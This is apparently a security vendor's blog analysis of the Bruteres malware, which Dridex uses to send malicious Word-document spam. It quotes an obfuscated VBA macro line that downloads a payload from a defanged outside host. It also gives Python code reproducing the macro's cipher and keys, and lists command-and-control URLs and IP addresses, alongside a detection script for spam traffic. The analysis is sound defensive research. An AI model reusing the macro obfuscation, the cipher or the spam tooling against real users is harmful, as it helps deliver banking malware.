Introduction

For a few days, there has been an increasing amount of Dridex spam targeting our mailboxes. We saw previously how Dridex operators can take control of your computer, using legacy software, in order to perform malicious banking operations [1].

Today, we will trace back to the source of the problem, that is the source of the Dridex malicious emails. We will see how Dridex is able to turn one’s computer into a Dridex “.doc” spam machine by using another malware dubbed Bruteres (Trubsil.C for Microsoft, Fidobot.A for Trend Micro).

Context

The Dridex botnet is split into several sub-botnets identified by a number called the “botid”. The most active sub-botnets in Europe were the following:

  • The 120 botnet, that targeted France the most between June and September
  • The 200 botnet
  • The 220 botnet

After the Dridex takedown that took place in September, the Dridex command and control server was offline for several weeks. Unfortunately, a new Dridex C&C appeared at the beginning of October, quickly followed by the reappearance of the 120 and 220 botnet spam. So far, most of the botnets’ activity seems to be focused on banks in the UK and South Asia. But French banks are still targeted, in particular for the theft of website credentials.

On October 22nd, Lexsi saw the 220 botnet issue, for a few seconds, a download order to some of the computers in the network. The downloaded target was an executable file, as was previously the case for Ammyy Admin [1]. Let’s have a look at the program’s behavior and see what it is all about.

First look at the file

The file we will analyze today [2] was downloaded on 2015-10-22 by at least two infected computers of the 220 botnet. A quick look at the binary file tells us it is protected by a crypter. Good indicators of such a protection are for instance the non-standard section names or the sentences of random words inside the binary, which are typical of some obfuscators.

[Figure: dridex_packed]

The obfuscation layer is fortunately quite straightforward, as the original binary file quickly gets unpacked in memory at runtime. The plain-text malware we obtained is a 364 KB Delphi application most likely compiled on 2015-08-17. It is an instance of the Bruteres/Trusbil/Fidobot malware, which has been known in the wild since at least 2013. Analysis of the Delphi types and units, using for instance the tool IDR [3], gives us a hint of what this piece of code is capable of:

[Figure: Dridex_units]

At first glance, this malware seems to support many operation modes, such as brute-forcing of web application credentials or spam. The TCmdGet type seems particularly interesting there, since it suggests this instance is able to get commands from a remote Internet address. In fact, dynamic analysis of the file shows us the program communicates with its command and control server using the following URLs:

  • hxxp://sprwinupdate.com/checkres.php
  • hxxp://sprwinupdate.com/cmd.php
  • hxxp://sprwinupdate.com/bruteres.php
  • hxxp://sprwinupdate.com/emailcheckres.php

The protocol used is plain HTTP and no crypto is visible there. We can thus learn a bit more about the commands the malware receives by logging the HTTP traffic involving hxxp://sprwinupdate.com/cmd.php.

Spam machine

The Bruteres command protocol is really straightforward. No crypto at all is used: the malware simply gets a list of (malicious) jobs to perform from the cmd.php address. In our case, all the orders given are spam requests. An example spam request is available online [4]. Every command contains the following information:

  • A list of 30 SMTP server addresses, each with stolen credentials.
  • A list of 2000 spam target emails (botid-_26051.txt)
  • A list of 1000 fake sender names, most likely randomly generated (4.txt [5])
  • A Word document (36097.doc [6])
  • Several templates used to build the different spam email fields (attachment name, subject, etc.)

The next cmd.php request the malware sends gives back a different Word document (with an increasing ID number), additional SMTP credentials and 2000 additional email addresses (also with an increasing ID). The sender list was the same. If IDs increase step by step, we can infer that this particular spam server contains more than 5 million spam target emails and that more than 35000 Word documents have been generated.
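The job structure above gives a defender two cheap network signals: a workstation that suddenly opens SMTP sessions to many distinct mail servers (each job ships 30 of them), and HTTP requests to the C&C hostname observed above. The following Python script is an added example, not code from the original post or from the malware; it runs the two heuristics over a small constructed connection log (the addresses, the allowed relay 10.0.0.25 and the log format are all invented for the example; only the sprwinupdate.com hostname comes from the analysis):

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample connection log (not from the original post). Fields:
# timestamp  source  destination  destination-port  description
SAMPLE_LOG = """\
2015-10-22T09:00:01 10.0.5.17 198.51.100.5 80 GET http://sprwinupdate.com/cmd.php
2015-10-22T09:00:04 10.0.5.17 203.0.113.11 25 SMTP session
2015-10-22T09:00:05 10.0.5.17 203.0.113.12 25 SMTP session
2015-10-22T09:00:05 10.0.5.17 203.0.113.13 587 SMTP session
2015-10-22T09:00:06 10.0.5.17 203.0.113.14 25 SMTP session
2015-10-22T09:00:07 10.0.5.17 203.0.113.15 25 SMTP session
2015-10-22T09:00:08 10.0.5.17 203.0.113.16 465 SMTP session
2015-10-22T09:00:09 10.0.5.17 203.0.113.17 25 SMTP session
2015-10-22T09:01:30 10.0.5.17 198.51.100.5 80 GET http://sprwinupdate.com/checkres.php
2015-10-22T09:02:00 10.0.5.42 10.0.0.25 25 SMTP session
2015-10-22T09:02:10 10.0.5.42 10.0.0.25 25 SMTP session
2015-10-22T09:03:00 10.0.5.42 198.51.100.9 443 TLS
2015-10-22T11:15:00 10.0.5.60 203.0.113.50 25 SMTP session
2015-10-22T11:15:01 10.0.5.60 203.0.113.51 25 SMTP session
"""

SMTP_PORTS = {25, 465, 587}
# Command-and-control hostname seen in the dynamic analysis of the Bruteres sample
BRUTERES_C2_HOSTS = {"sprwinupdate.com"}
# The one mail relay workstations are allowed to talk to (constructed for the example)
ALLOWED_RELAYS = {"10.0.0.25"}


def parse_log(text):
    """Parse the constructed log format into (timestamp, src, dst, port, description) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, desc = line.split(maxsplit=4)
        records.append((datetime.fromisoformat(ts), src, dst, int(port), desc))
    return records


def find_spam_machines(records, window=timedelta(minutes=10), max_servers=5):
    """Return {source_host: [reasons]} for hosts that behave like a Bruteres spam node.

    A host is reported when it contacts a known C&C hostname, or when it opens SMTP
    sessions to more than `max_servers` distinct non-relay servers inside `window`.
    """
    findings = defaultdict(list)
    c2_by_src = defaultdict(set)
    smtp_by_src = defaultdict(list)  # src -> [(timestamp, destination)]
    for ts, src, dst, port, desc in records:
        if any(host in desc for host in BRUTERES_C2_HOSTS):
            c2_by_src[src].add(desc)
        if port in SMTP_PORTS and dst not in ALLOWED_RELAYS:
            smtp_by_src[src].append((ts, dst))

    for src, descs in c2_by_src.items():
        findings[src].append("contacted Bruteres C&C: " + "; ".join(sorted(descs)))

    for src, events in smtp_by_src.items():
        events.sort()
        # Sliding window over the host's SMTP sessions: largest set of distinct servers.
        best, best_start, start = 0, None, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {dst for _, dst in events[start:end + 1]}
            if len(distinct) > best:
                best, best_start = len(distinct), events[start][0]
        if best > max_servers:
            findings[src].append(
                f"{best} distinct SMTP servers within {window} (from {best_start.isoformat()})")
    return dict(findings)


if __name__ == "__main__":
    for host, reasons in find_spam_machines(parse_log(SAMPLE_LOG)).items():
        print(host)
        for reason in reasons:
            print("  -", reason)
```

The threshold of five distinct servers is a starting point, not a tuned value: a normal workstation submits mail through one relay, so anything that fans out to a dozen Internet mail servers in a few minutes deserves a look, while the allowed-relay list keeps legitimate traffic out of the report.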

If we look at the email templates, we can find the usual catchy subjects that are used in several Dridex emails:

{ACH|Wire|Quick|Fast|BillPay|International|Automated Clearing House|Domestic|SWIFT|SEPA|Overnight} {transfer|payment} {Status|Transaction Status|Transfer status|Recent Status|The Last Status|General Status|Updated Status|Changed Status|Payment Status|State}

In order to confirm that it is in fact a Dridex spam, we have to analyze the Word document first.

Word document analysis

The Word document downloaded [6] by the Bruteres malware contains obfuscated VBA macros, as the several useless lines of VBA code and the random variable names suggest. As usual for malicious Word macros, we are looking for the binary file URL stored, obfuscated, somewhere inside the document. This command can be spotted by looking for the “Open” keyword:

KjDJbMYhykW5A.Open FZRfhv43w8Wn(Chr(217) + Chr(247) + Chr(195), "Hhv9BbfkfdivZhMax"), FZRfhv43w8Wn(Chr(246) + Chr(225) + Chr(217) + Chr(182) + Chr(145) + Chr(146) + Chr(16) + Chr(61) + Chr(13) + Chr(1) + Chr(89) + Chr(38) + Chr(43) + Chr(13) + Chr(76) + Chr(36) + Chr(35) + Chr(70) + Chr(110) + Chr(26) + Chr(26) + Chr(74) + Chr(122) + Chr(61) + Chr(16) + Chr(73) + Chr(63) + Chr(42) + Chr(86) + Chr(96) + Chr(43) + Chr(16) + Chr(125) + Chr(22) + Chr(4) + Chr(53) + Chr(58) + Chr(23) + Chr(66) + Chr(48) + Chr(16) + Chr(51) + Chr(44), "CCe1BT9Rja2"), False

It looks like Dridex slightly improved the obfuscation used in this document, as the use of the cipher function FZRfhv43w8Wn(data, key) suggests. This method, defined at the end of the macro module, is of course obfuscated too. A manual analysis allows us to recover its code and reimplement it in Python:

def decrypt(data, key):
    # Reimplementation of the VBA function FZRfhv43w8Wn(data, key); data and key are str.
    key = [ord(c) for c in key]
    # 286-entry substitution table: identity for 0..255, then 0..29 again
    array2 = list(range(256)) + list(range(0, 286 - 256))
    ubound = len(key) - 1
    # Six entries at both ends of the table are derived from the key
    for i in range(1, 7):
        array2[i + 249] = key[ubound - i]
        array2[i - 1] = key[i - 1] ^ (255 - key[ubound - i])
    res = []
    i = 0
    t = 0
    f = False
    for c in data:
        # Past the end of the table, restart at 0 or 5 alternately
        if t > 285:
            t = 5 if f else 0
            f = not f
        c = ord(c) ^ key[i % len(key)] ^ array2[t]
        i += 1
        t += 1
        res.append(c)
    return "".join(map(chr, res))

If we apply this Python function to the arguments present in the VBA line we saw previously, the binary download address appears:

  • hxxp://hoiandesign.com/images/_notes/p0.jpg

This is something new: not only does the “.jpg” file extension make its first appearance in Dridex documents (at least to the best of our knowledge), but the referenced file seems encrypted. By exploring the VBA macros further, one is able to get more clues about the cipher used:

EEzEUbNHYfhr XW4QKucq4Ih, FZRfhv43w8Wn(StrConv(KjDJbMYhykW5A.resPonsebodY, vbUnicode), 
    FZRfhv43w8Wn(Chr(196) + Chr(169) + Chr(254) + Chr(205) + Chr(253) + Chr(136) + Chr(87), "RBfBPOfWe9xe"))

The content of the downloaded file (resPonsebodY) is in fact decrypted using the cipher function analyzed previously. The cipher key is the string “Coded87”. Once the file is decrypted, the final binary file appears. Unsurprisingly, it is the first stage of the Dridex binary[7].
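To show the three decryptions above end to end (the HTTP verb, the download URL and the payload key “Coded87”), here is an added Python 3 example that is not part of the original post: it parses the `Chr(n) + Chr(n) + …` expressions copied from the two macro lines quoted above, runs them through a bytes-based copy of the cipher routine recovered above, and then applies the same routine to a payload. The payload round-trip uses a constructed blob, since the cipher is a plain XOR stream and therefore its own inverse; the VBA-side StrConv(…, vbUnicode) conversion of the response body is not modelled here (an assumption of the example), and the recovered URL is returned defanged as in the post.

```python
import re

CHR_RE = re.compile(r"Chr\((\d+)\)")


def vba_chr_expr_to_bytes(expr):
    """Turn a VBA expression such as 'Chr(217) + Chr(247) + Chr(195)' into bytes."""
    return bytes(int(n) for n in CHR_RE.findall(expr))


def bruteres_vba_cipher(data, key):
    """Bytes version of the macro's cipher function FZRfhv43w8Wn(data, key).

    Same table construction as the str-based reimplementation above; XOR-only,
    so the function decrypts and encrypts alike. Needs a key of at least 7 bytes.
    """
    table = list(range(256)) + list(range(30))  # 286 entries
    ubound = len(key) - 1
    for i in range(1, 7):
        table[i + 249] = key[ubound - i]
        table[i - 1] = key[i - 1] ^ (255 - key[ubound - i])
    out = bytearray()
    t, flip = 0, False
    for i, c in enumerate(data):
        if t > 285:               # wrap to 0 or 5 alternately once the table is exhausted
            t = 5 if flip else 0
            flip = not flip
        out.append(c ^ key[i % len(key)] ^ table[t])
        t += 1
    return bytes(out)


def defang(url):
    """Render a recovered URL non-clickable, as the post does (http -> hxxp)."""
    return re.sub(r"^http", "hxxp", url)


# Arguments copied verbatim from the two macro lines quoted in the analysis
VERB_EXPR = "Chr(217) + Chr(247) + Chr(195)"
VERB_KEY = b"Hhv9BbfkfdivZhMax"
URL_EXPR = (
    "Chr(246) + Chr(225) + Chr(217) + Chr(182) + Chr(145) + Chr(146) + Chr(16) + Chr(61) + "
    "Chr(13) + Chr(1) + Chr(89) + Chr(38) + Chr(43) + Chr(13) + Chr(76) + Chr(36) + Chr(35) + "
    "Chr(70) + Chr(110) + Chr(26) + Chr(26) + Chr(74) + Chr(122) + Chr(61) + Chr(16) + Chr(73) + "
    "Chr(63) + Chr(42) + Chr(86) + Chr(96) + Chr(43) + Chr(16) + Chr(125) + Chr(22) + Chr(4) + "
    "Chr(53) + Chr(58) + Chr(23) + Chr(66) + Chr(48) + Chr(16) + Chr(51) + Chr(44)"
)
URL_KEY = b"CCe1BT9Rja2"
PAYLOAD_KEY_EXPR = "Chr(196) + Chr(169) + Chr(254) + Chr(205) + Chr(253) + Chr(136) + Chr(87)"
PAYLOAD_KEY_KEY = b"RBfBPOfWe9xe"


def recover_macro_strings():
    """Return (HTTP verb, defanged download URL, payload key) decoded from the macro."""
    verb = bruteres_vba_cipher(vba_chr_expr_to_bytes(VERB_EXPR), VERB_KEY).decode()
    url = bruteres_vba_cipher(vba_chr_expr_to_bytes(URL_EXPR), URL_KEY).decode()
    payload_key = bruteres_vba_cipher(
        vba_chr_expr_to_bytes(PAYLOAD_KEY_EXPR), PAYLOAD_KEY_KEY).decode()
    return verb, defang(url), payload_key


def decrypt_payload(blob, payload_key):
    """Apply the same cipher to a downloaded response body with the recovered key."""
    return bruteres_vba_cipher(blob, payload_key.encode())


if __name__ == "__main__":
    verb, url, payload_key = recover_macro_strings()
    print(verb, url, "payload key:", payload_key)
    # Constructed blob longer than the 286-entry table, to exercise the wrap-around path
    sample = bytes(range(256)) * 3
    assert decrypt_payload(decrypt_payload(sample, payload_key), payload_key) == sample
```

Because only the Chr() expressions and keys change between documents, the same two helpers can be pointed at the “Open” line of another sample from this campaign to recover its download URL without stepping through the macro by hand.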

To take the analysis a bit further, it is interesting to have a quick look at this first stage program. We saw in a previous blog post [8] how to retrieve the static configuration from a Dridex sample. By using this method on this binary (once deobfuscated, of course), the following initial configuration appears:

<config botnet="301">
  <server_list>
    46.37.1.88:473
    91.142.221.195:5445
    198.89.98.212:3443
  </server_list>
</config>

What we downloaded is in fact a botnet 301 sample! Judging by the analysis of the dynamic configuration (the web injects) of this botnet and by the spam target emails, this particular botnet seems to target North America.

Conclusion

Once again, Dridex seems to use external software in order to achieve its malicious goals. By using a rather simple malware, Bruteres, the botnet is able to send millions of booby-trapped emails. By analysing this malware, we were able to see how Dridex actually builds and sends all these emails using infected computers.

If you detect suspicious SMTP traffic in your network, it can be the sign of a Dridex infection. In any case, don’t hesitate to contact our incident response team for any assistance regarding a Dridex infection [9].

References

[1] https://www.lexsi.com/securityhub/dridex-ammyy-admin-post-infection-move/?lang=en
[2] https://www.virustotal.com/fr/file/d34a55b669d2f80ed379d46aa7581fd7a648a931059c002444ce44c3dd6f31bf/analysis/
[3] http://kpnc.org/idr32/en/index.htm
[4] http://pastebin.com/93nPZhQY
[5] http://pastebin.com/nyVeKjP4
[6] https://www.virustotal.com/fr/file/d3000190a55a197da1401dcf3dfdc84ca729a633ac5c7af7124f2b3ca09ae344/analysis/
[7] https://www.virustotal.com/fr/file/b029113af448c4055bd101cd7397820b21dbfef19b3dfd7e7f0f77fdeef9c3ee/analysis/
[8] https://www.lexsi.com/securityhub/dridex-tests-new-lnk-email-attachments/?lang=en
[9] https://www.lexsi.com/en/emergency-contact